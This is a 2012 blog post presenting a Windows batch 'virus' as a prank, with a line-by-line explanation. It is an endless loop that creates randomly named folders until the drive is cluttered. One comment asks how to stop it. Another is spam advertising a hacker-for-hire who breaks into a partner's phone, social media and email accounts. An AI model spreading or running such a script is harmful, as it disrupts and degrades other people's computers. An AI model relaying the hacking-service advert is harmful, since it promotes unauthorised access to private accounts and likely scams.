Friday, May 25, 2012

Code to create a infinite folder in a drive | Pranks


Hi newbie Programmers, this batch code will very helpful for you.  This is simple and effective virus code.

As usual open notepad.
Copy this code to Notepad.

@echo off
:top
md %random%
goto top

@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop


Save the file with .bat extension(for eg: cehweb.bat)

That's all if you double click the file it will create a finite folder wherever the batch file is..

Join our Blog..

2 comments:

Unknown said...

i made this virus on my pc and i want to disable it how i disable it

jane holly said...

My life was falling apart, I was being cheated and abused, I had to know the truth and needed proof. I contacted a private investigator that linked me with onlineghost who took care of the hack job. He hacked his iPhone,Facebook,Instagram, Whats app, twitter and email account. I got all I wanted as proof . I”m glad i had a proven truth he was cheating . Contact him for any hack job. Tell him i referred you to him, he will surely meet your hack need. Contact: onlineghosthacker247@ gmail .com

Post a Comment

 
Design by Secure Hackers